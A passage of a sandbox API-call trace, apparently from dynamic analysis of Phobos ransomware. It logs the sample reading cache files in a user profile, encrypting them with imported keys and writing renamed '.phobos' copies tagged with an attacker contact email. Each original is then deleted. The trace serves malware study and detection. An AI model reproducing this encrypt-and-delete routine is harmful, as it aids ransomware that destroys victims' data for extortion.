(lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\c46e7b0f942663a1edc8d9d6d7869173_d9b9f37ece595b0b7b6aa12451d392cf.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0196.837] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\c46e7b0f942663a1edc8d9d6d7869173_d9b9f37ece595b0b7b6aa12451d392cf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0196.837] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0196.837] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0196.837] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\c46e7b0f942663a1edc8d9d6d7869173_d9b9f37ece595b0b7b6aa12451d392cf.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0196.838] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa328a8) returned 1 [0196.838] CryptSetKeyParam (hKey=0xa328a8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0196.838] ReadFile (in: hFile=0x178, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x6e3, lpOverlapped=0x0) returned 1 [0196.839] CryptEncrypt (in: hKey=0xa328a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x6f0, dwBufLen=0x6f0 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x6f0) returned 1 [0196.839] WriteFile (in: hFile=0x130, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x6f0, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x6f0, lpOverlapped=0x0) returned 1 [0196.840] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32a28) returned 1 [0196.840] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0196.840] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xb0, dwBufLen=0xb0 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xb0) returned 1 [0196.840] CryptDestroyKey (hKey=0xa32a28) returned 1 [0196.840] WriteFile (in: hFile=0x130, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x162, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x162, lpOverlapped=0x0) returned 1 [0196.840] CryptDestroyKey (hKey=0xa328a8) returned 1 [0196.840] CloseHandle (hObject=0x178) returned 1 [0196.840] CloseHandle (hObject=0x130) returned 1 [0196.840] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\c46e7b0f942663a1edc8d9d6d7869173_d9b9f37ece595b0b7b6aa12451d392cf")) returned 1 [0196.843] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0196.843] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\D47DBD2F9E3365FBBE008D71FB06716F_4DD1053BCC726DA41115FFF4C7D6E9CC" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\d47dbd2f9e3365fbbe008d71fb06716f_4dd1053bcc726da41115fff4c7d6e9cc"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0196.843] GetFileSizeEx (in: hFile=0x130, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=1454) returned 1 [0196.843] CloseHandle (hObject=0x130) returned 1 [0196.843] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\D47DBD2F9E3365FBBE008D71FB06716F_4DD1053BCC726DA41115FFF4C7D6E9CC" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\d47dbd2f9e3365fbbe008d71fb06716f_4dd1053bcc726da41115fff4c7d6e9cc")) returned 0x2024 [0196.843] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\D47DBD2F9E3365FBBE008D71FB06716F_4DD1053BCC726DA41115FFF4C7D6E9CC.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\d47dbd2f9e3365fbbe008d71fb06716f_4dd1053bcc726da41115fff4c7d6e9cc.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0196.843] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\D47DBD2F9E3365FBBE008D71FB06716F_4DD1053BCC726DA41115FFF4C7D6E9CC" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\d47dbd2f9e3365fbbe008d71fb06716f_4dd1053bcc726da41115fff4c7d6e9cc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0196.844] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0196.844] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0196.844] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\D47DBD2F9E3365FBBE008D71FB06716F_4DD1053BCC726DA41115FFF4C7D6E9CC.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\d47dbd2f9e3365fbbe008d71fb06716f_4dd1053bcc726da41115fff4c7d6e9cc.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0196.844] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa328a8) returned 1 [0196.844] CryptSetKeyParam (hKey=0xa328a8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0196.844] ReadFile (in: hFile=0x130, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x5ae, lpOverlapped=0x0) returned 1 [0196.846] CryptEncrypt (in: hKey=0xa328a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x5b0, dwBufLen=0x5b0 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x5b0) returned 1 [0196.846] WriteFile (in: hFile=0x178, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x5b0, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x5b0, lpOverlapped=0x0) returned 1 [0196.847] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32a28) returned 1 [0196.847] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0196.847] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xb0, dwBufLen=0xb0 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xb0) returned 1 [0196.847] CryptDestroyKey (hKey=0xa32a28) returned 1 [0196.847] WriteFile (in: hFile=0x178, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x162, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x162, lpOverlapped=0x0) returned 1 [0196.847] CryptDestroyKey (hKey=0xa328a8) returned 1 [0196.847] CloseHandle (hObject=0x130) returned 1 [0196.847] CloseHandle (hObject=0x178) returned 1 [0196.847] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\D47DBD2F9E3365FBBE008D71FB06716F_4DD1053BCC726DA41115FFF4C7D6E9CC" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\d47dbd2f9e3365fbbe008d71fb06716f_4dd1053bcc726da41115fff4c7d6e9cc")) returned 1 [0196.848] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0196.848] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\D47DBD2F9E3365FBBE008D71FB06716F_D33192D58AA9CA2B9097E848E9FE86DE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\d47dbd2f9e3365fbbe008d71fb06716f_d33192d58aa9ca2b9097e848e9fe86de"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0196.871] GetFileSizeEx (in: hFile=0x14c, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=1454) returned 1 [0196.871] CloseHandle (hObject=0x14c) returned 1 [0196.872] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\D47DBD2F9E3365FBBE008D71FB06716F_D33192D58AA9CA2B9097E848E9FE86DE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\d47dbd2f9e3365fbbe008d71fb06716f_d33192d58aa9ca2b9097e848e9fe86de")) returned 0x2024 [0196.872] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\D47DBD2F9E3365FBBE008D71FB06716F_D33192D58AA9CA2B9097E848E9FE86DE.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\d47dbd2f9e3365fbbe008d71fb06716f_d33192d58aa9ca2b9097e848e9fe86de.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0196.872] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\D47DBD2F9E3365FBBE008D71FB06716F_D33192D58AA9CA2B9097E848E9FE86DE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\d47dbd2f9e3365fbbe008d71fb06716f_d33192d58aa9ca2b9097e848e9fe86de"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0196.872] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0196.872] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0196.872] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\D47DBD2F9E3365FBBE008D71FB06716F_D33192D58AA9CA2B9097E848E9FE86DE.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\d47dbd2f9e3365fbbe008d71fb06716f_d33192d58aa9ca2b9097e848e9fe86de.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0196.873] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32a28) returned 1 [0196.873] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0196.873] ReadFile (in: hFile=0x14c, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x5ae, lpOverlapped=0x0) returned 1 [0196.888] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x5b0, dwBufLen=0x5b0 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x5b0) returned 1 [0196.888] WriteFile (in: hFile=0x17c, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x5b0, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x5b0, lpOverlapped=0x0) returned 1 [0196.889] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32ce8) returned 1 [0196.889] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0196.889] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xb0, dwBufLen=0xb0 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xb0) returned 1 [0196.889] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0196.889] WriteFile (in: hFile=0x17c, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x162, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x162, lpOverlapped=0x0) returned 1 [0196.889] CryptDestroyKey (hKey=0xa32a28) returned 1 [0196.890] CloseHandle (hObject=0x14c) returned 1 [0196.890] CloseHandle (hObject=0x17c) returned 1 [0196.890] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\D47DBD2F9E3365FBBE008D71FB06716F_D33192D58AA9CA2B9097E848E9FE86DE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\d47dbd2f9e3365fbbe008d71fb06716f_d33192d58aa9ca2b9097e848e9fe86de")) returned 1 [0196.891] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0196.891] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\D52C56D8F24BEC96604372AFBAF264E1_E76A2B627DD019EB51D9335F24B14C2C" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\d52c56d8f24bec96604372afbaf264e1_e76a2b627dd019eb51d9335f24b14c2c"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0196.891] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=1635) returned 1 [0196.891] CloseHandle (hObject=0x17c) returned 1 [0196.891] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\D52C56D8F24BEC96604372AFBAF264E1_E76A2B627DD019EB51D9335F24B14C2C" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\d52c56d8f24bec96604372afbaf264e1_e76a2b627dd019eb51d9335f24b14c2c")) returned 0x2024 [0196.891] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\D52C56D8F24BEC96604372AFBAF264E1_E76A2B627DD019EB51D9335F24B14C2C.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\d52c56d8f24bec96604372afbaf264e1_e76a2b627dd019eb51d9335f24b14c2c.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0196.892] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\D52C56D8F24BEC96604372AFBAF264E1_E76A2B627DD019EB51D9335F24B14C2C" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\d52c56d8f24bec96604372afbaf264e1_e76a2b627dd019eb51d9335f24b14c2c"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0196.892] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0196.892] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0196.892] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\D52C56D8F24BEC96604372AFBAF264E1_E76A2B627DD019EB51D9335F24B14C2C.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\d52c56d8f24bec96604372afbaf264e1_e76a2b627dd019eb51d9335f24b14c2c.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0196.892] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32a28) returned 1 [0196.892] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0196.893] ReadFile (in: hFile=0x17c, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x663, lpOverlapped=0x0) returned 1 [0196.982] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x670, dwBufLen=0x670 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x670) returned 1 [0196.982] WriteFile (in: hFile=0x14c, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x670, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x670, lpOverlapped=0x0) returned 1 [0196.983] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32ae8) returned 1 [0196.983] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0196.983] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xb0, dwBufLen=0xb0 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xb0) returned 1 [0196.983] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0196.983] WriteFile (in: hFile=0x14c, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x162, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x162, lpOverlapped=0x0) returned 1 [0196.983] CryptDestroyKey (hKey=0xa32a28) returned 1 [0196.983] CloseHandle (hObject=0x17c) returned 1 [0196.983] CloseHandle (hObject=0x14c) returned 1 [0196.983] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\D52C56D8F24BEC96604372AFBAF264E1_E76A2B627DD019EB51D9335F24B14C2C" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\d52c56d8f24bec96604372afbaf264e1_e76a2b627dd019eb51d9335f24b14c2c")) returned 1 [0196.984] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0196.984] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\F90F18257CBB4D84216AC1E1F3BB2C76" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\f90f18257cbb4d84216ac1e1f3bb2c76"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x16c [0196.990] GetFileSizeEx (in: hFile=0x16c, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=550) returned 1 [0196.990] CloseHandle (hObject=0x16c) returned 1 [0196.990] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\F90F18257CBB4D84216AC1E1F3BB2C76" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\f90f18257cbb4d84216ac1e1f3bb2c76")) returned 0x2024 [0196.990] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\F90F18257CBB4D84216AC1E1F3BB2C76.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\f90f18257cbb4d84216ac1e1f3bb2c76.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0196.991] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\F90F18257CBB4D84216AC1E1F3BB2C76" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\f90f18257cbb4d84216ac1e1f3bb2c76"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x16c [0196.991] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0196.991] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0196.991] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\F90F18257CBB4D84216AC1E1F3BB2C76.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\f90f18257cbb4d84216ac1e1f3bb2c76.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170 [0196.991] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32b68) returned 1 [0196.991] CryptSetKeyParam 